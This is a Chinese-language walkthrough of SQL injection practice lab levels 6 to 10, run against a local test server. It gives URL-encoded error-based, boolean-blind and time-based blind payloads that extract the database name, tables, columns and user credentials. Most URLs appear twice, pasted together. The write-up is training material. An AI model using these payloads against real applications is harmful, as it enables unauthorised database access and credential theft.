第六关

一确定攻击点判断闭合方式

跟个双引号引起报错 说明页面有报错语句的位置

http://127.0.0.1/Less-6/?id=1%22http://127.0.0.1/Less-6/?id=1%22尝试闭合 闭合成功

http://127.0.0.1/Less-6/?id=1%22%20--+http://127.0.0.1/Less-6/?id=1%22%20--+

二.查询数据库名

 http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,database()))%20--+http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,database()))%20--+

 

三.查表名

http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue%281,concat%281,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=%27security%27%20%29%29%29%20%20--+http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue%281,concat%281,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=%27security%27%20%29%29%29%20%20--+ 

四.查列名

http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)))%20--+http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)))%20--+

五.查具体的username和password

http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(username,password)%20from%20users)))%20--+http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(username,password)%20from%20users)))%20--+

第七关 

一确定攻击点判断闭合方式

http://127.0.0.1/Less-7/?id=1%27))%20--+http://127.0.0.1/Less-7/?id=1%27))%20--+

二.查询数据库名

http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E7%20--+http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E7%20--+

 http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E8%20--+http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E8%20--+

说明数据库长度为8

http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr(database(),1,1))%3E114%20--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr(database(),1,1))%3E114%20--+

利用sacii表和bp抓包工作可以直接得出数据库为security 

 

三.查表名

http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+ 
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推

................................

最终得出第一张表的表名为emails

也可用不让burp抓包和sacii表得出

四.查列名

http://127.0.0.1/Less-7/?id=1'))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema='security'%20and%20table_name='users'%20limit%200,1),1,1))%3E104--+http://127.0.0.1/Less-7/?id=1'))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema='security'%20and%20table_name='users'%20limit%200,1),1,1))%3E104--+

 http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............

最终得出users表的第一个字段为id

同上所述一样

五.查具体的username

http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+

http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+ 

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........

最终得出users表里面的username字段的第一条数据为Dumb

第八关

一.确定攻击点判断闭合方式

http://127.0.0.1/Less-8/?id=1%27

http://127.0.0.1/Less-8/?id=1%27%20--+http://127.0.0.1/Less-8/?id=1%27%20--+ 

二.查询数据库

使用布尔盲注

http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E7--+http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E7--+ 
http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E8--+http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E8--+

 

说明数据库长度为8

http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+ 

http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E115--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E115--+ 

 数据库第一位字符ascii码为115 's'。

综上所述

...........

反复进几次

最终得出数据库名为security

三.查表名

http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+

http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+ 

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

.......以此类推

最终得出第一张表的表名为emails

四.查user表中第一个字段的第一个字符

http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104--+

 http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............

最终得出users表的第一个字段为id

五.判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+

http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........

最终得出users表里面的username字段的第一条数据为Dumb

第九关

if(布尔盲注语句,sleep(3),1) //if判断语句，当布尔盲注语句成立时，执行sleep(3)，否则执行1。

一.检查发现id等于多少都没有报错，可以使用时间盲注

http://127.0.0.1/Less-9/?id=adbfsfhttp://127.0.0.1/Less-9/?id=adbfsf

二.进行时间盲注的判断发现响应时间为sleep函数执行的时间则存在

http://127.0.0.1/Less-9/?id=1%27%20and%20sleep(3)--+http://127.0.0.1/Less-9/?id=1%27%20and%20sleep(3)--+

三.判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+

 页面延迟3秒

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115 

http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

四.查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+

 页面延迟3秒http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

.............

终得出第一张表的表名为emails

五.判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+

页面延迟3秒 
http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+

页面正常访问

说明users表的第一个字段的第一位字符ascii码为105 'i'

............

最终得出users表的第一个字段为id

六.判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+

页面延迟3秒

http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68,sleep(3),1)--+http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68,sleep(3),1)--+ 

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........

最终得出users表里面的username字段的第一条数据为Dumb

第十关

 一.检查发现id等于多少都没有报错，可以使用时间盲注

http://127.0.0.1/Less-10/?id=sfvdsgblhttp://127.0.0.1/Less-10/?id=sfvdsgbl

二.进行时间盲注的判断发现响应时间为sleep函数执行的时间则存在

http://127.0.0.1/Less-10/?id=1%22%20and%20sleep(3)--+http://127.0.0.1/Less-10/?id=1%22%20and%20sleep(3)--+

三.判断数据库的第一个字符 

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

...............

最终得出数据库名为security

四.查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+

页面延迟三秒访问

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

.........

最终得出第一张表的表名为emails

五.判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+

页面延迟三秒访问 

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+ 

说明users表的第一个字段的第一位字符ascii码为105 'i'

............

最终得出users表的第一个字段为id

 六.判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+

页面延迟三秒

http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68%20,sleep(3),1)--+http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68%20,sleep(3),1)--+